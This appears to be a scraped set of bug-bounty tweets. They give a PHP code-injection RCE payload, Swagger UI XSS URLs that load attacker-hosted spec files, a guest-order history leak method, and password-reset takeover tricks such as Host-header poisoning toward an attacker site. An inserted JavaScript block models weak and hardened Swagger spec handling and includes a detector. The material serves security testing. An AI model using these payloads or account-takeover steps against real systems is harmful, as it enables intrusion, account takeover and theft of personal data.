This is the quickest RCE I've ever gotten.
The app has a popup for multi-selection fields. I intercepted the request, expecting XSS or SQLi, but found that the parameter **_session_name= can be exploited to get an #RCE as a surprise.
Payload: `&**='.print((`id`)).'` #BugBounty
The 2024 Brand Ambassadors are ready to kick off the year right! Thank you to everyone who submitted their applications to the program this year.
Check out the thread below to see our newest ambassadors, and sign up on https://t.co/PQVu5jSIFE to join your local chapter!
API hacking is simple, easier to learn and reproduce.
Down below are massive API hacking resources.
PS: You might definitely want to bookmark this and come.
We're excited to announce that @Bugcrowd is our Official Sponsor for the AirTech CTF, the Biggest Capture the Flag event by Air University in Collaboration with OffensioX!
If you haven't registered yet, go ahead and register ASAP
Registration Link: https://t.co/9WjhyNRNxM
@Hacker0x01 I think it was time for you to review your h1_analysts, a lot of them are ghosting researchers after closing the report as informative, look at this simple SMTP vulnerability that your so-called analyst can't understand.
Bug Bounty Tips: Here's a simple bug bounty tip for shopping site targets that can earn you some serious $$$$.
I've stumbled upon 10+ similar issues on shopping sites that allow guest checkouts.
Many overlook these issues because they require placing an order. However, some services support cash on delivery or allow you to place a cheap order and then cancel it for a refund, making it worth adding to your checklist if other prerequisites are met.
Here's what to look for:
1️⃣ Target app that permits guest orders without creating an account
2️⃣ Target app doesn't require email verification for new account creation, or you've found an email verification bypass on sign-up
If these prerequisites are met, you can often find target apps with a misconfiguration that lets you access a guest user's order history by creating a new account with the same email used for the guest order.
Here's how it usually goes down:
1️⃣ Place an order on the site as a "Guest" and use the victim's email during checkout, e.g., [email protected]
2️⃣ The victim receives an email with the receipt
3️⃣ As an attacker, sign up using the email [email protected], assuming there's no email verification
4️⃣ Navigate to the account's order history page, and you might strike gold by finding the previously made orders, leading to Order History and PII leaks
Takeaways: Don't ignore workflows involving payments; you might discover workarounds like cheap payments or cash on delivery. Test for unusual flows and be ready for pleasant surprises with some lucrative bounties. #BugBounty #CyberSecurity #HackerOne #BugBountyTips #SecurityTips #Bounties #infosecurity
How to access a company without being part of it with Google OAuth, with your Gmail account. [It only works if the company has a misconfiguration!] #bugbountytips #bugbounty
Quick Wins: If you come across an outdated Swagger instance, always remember to test for XSS vulnerabilities. Try these payloads and earn some quick bounties!
http://example(.)com/swagger-ui/index.html?configUrl=https://jumpy-floor.surge(.)sh/test.json
http://example(.)com/swagger-ui/index.html?url=https://jumpy-floor.surge(.)sh/test.yaml
http://example(.)com/swagger-ui/index.html?configUrl=https://xss.smarpo(.)com/test.json&url=https://jumpy-floor.surge(.)sh/test.yaml
Always try escalating these Issues to an Account takeover to earn a 'High' severity payout.
#EthicalHacking #BugBounty #SecurityTips #Cybersecurity #StaySecure
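An added example, not part of the tweet and not swagger-ui's own code: a standalone model of how a Swagger UI page picks the OpenAPI document it renders. The weak resolver honours `configUrl`/`url` from the query string, which is what the payloads above rely on; the hardened resolver ignores query overrides unless explicitly enabled (swagger-ui exposes that switch as `queryConfigEnabled`) and then only for allowlisted origins. A small log-scanning helper shows how to spot such loads after the fact. The page origin, spec URLs and request paths are constructed.

```javascript
// Added example: spec-source resolution for a Swagger UI page, weak vs hardened.
// DEFAULT_SPEC_URL and every URL in the tests are constructed values.
const DEFAULT_SPEC_URL = 'https://api.example.com/v1/openapi.json';

// Weak behaviour: any configUrl or url query parameter overrides the spec source,
// so the page fetches and renders a document from whatever origin the link names.
function resolveSpecUrlWeak(search, pageOrigin) {
  const params = new URLSearchParams(search);
  const override = params.get('configUrl') || params.get('url');
  if (!override) return { source: 'default', url: DEFAULT_SPEC_URL };
  return { source: 'query', url: new URL(override, pageOrigin).href };
}

// Hardened behaviour: query overrides are off unless queryConfigEnabled is set,
// and even then only origins on the allowlist are honoured; anything else falls
// back to the default document and is reported in `rejected`.
function resolveSpecUrlHardened(search, pageOrigin, opts = {}) {
  const { queryConfigEnabled = false, allowedOrigins = [] } = opts;
  if (!queryConfigEnabled) return { source: 'default', url: DEFAULT_SPEC_URL };
  const params = new URLSearchParams(search);
  const override = params.get('configUrl') || params.get('url');
  if (!override) return { source: 'default', url: DEFAULT_SPEC_URL };
  let parsed;
  try {
    parsed = new URL(override, pageOrigin);
  } catch (e) {
    return { source: 'default', url: DEFAULT_SPEC_URL, rejected: override };
  }
  if (!allowedOrigins.includes(parsed.origin)) {
    return { source: 'default', url: DEFAULT_SPEC_URL, rejected: parsed.href };
  }
  return { source: 'query', url: parsed.href };
}

// Detection helper: given request paths from an access log, return the Swagger UI
// loads whose override points off-origin (the pattern used in the payloads above).
function flagOffOriginSpecLoads(requestPaths, pageOrigin) {
  return requestPaths.filter((p) => {
    if (!p.includes('swagger-ui')) return false;
    const q = p.indexOf('?');
    if (q < 0) return false;
    const r = resolveSpecUrlWeak(p.slice(q), pageOrigin);
    return r.source === 'query' && new URL(r.url).origin !== pageOrigin;
  });
}
```

Upgrading swagger-ui to a version where query configuration is disabled by default removes the weak branch entirely; the allowlist variant is for deployments that legitimately switch between several first-party specs via the URL.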
Question of the day: What are the common vulnerabilities within the "Forgot Password" functionality?
Many users tend to overlook testing the "Forgot Password" feature of a target app. However, these functions are often susceptible to various issues. If exploited, these issues can lead to an account takeover, yielding bounties ranging from $750 to $7500, depending on the program.
Here are the common issues you should be on the lookout for:
1️⃣ Token and username parameter: Some target apps often generate a password reset link containing a token and a username parameter. In such cases, request a password reset link on your attacker account, navigate to it, and attempt to replace the "username" parameter with the victim's username. Try resetting the password using your token. This is frequently one of the most common issues I've encountered that leads to an Account Takeover (ATO).
2️⃣ Password reset poisoning: Request a password reset using the victim's account and alter the "Host" header of the request to https://attackercontrolledsite(.)com. If the target app is vulnerable, this will trigger an email to the victim with a password link pointing to your server (e.g., https://attackercontrolledsite(.)com?token=dsksdjsdjsdjdsjdsjsd). When the victim clicks on this link, you will receive the password reset token, paving the way for an ATO.
3️⃣ HTTP Parameter Pollution: When requesting a password reset, always attempt to pass multiple email parameters (e.g., email=victim@target(.)com&email=attacker@target(.)com). Depending on how the application's backend is set up, it may have different routines running on various servers to check validity and send emails. Consequently, it could inadvertently send the password reset link of victim@target(.)com to attacker@target(.)com.
4️⃣ None of the above worked? Fret not! We have many more scenarios that can be exploited, and we'll discuss them in our future tweets.
Takeaways: Never underestimate the importance of the password reset functionality, as issues in these areas can lead to lucrative payouts. Be creative and make sure to add these items to your checklist.
#CyberSecurityTips #SecurityTips #BugBountyTips #InfoSec #HackerOne #BugCrowd #portswigger #burpsuite
I often export proxy items from Burp to extract certain data. Example: filter out all response headers where request param is X, get a list of all response params for custom wordlist creation etc. I built this tool to make it do what I want: https://t.co/KH4ZYsw5Xc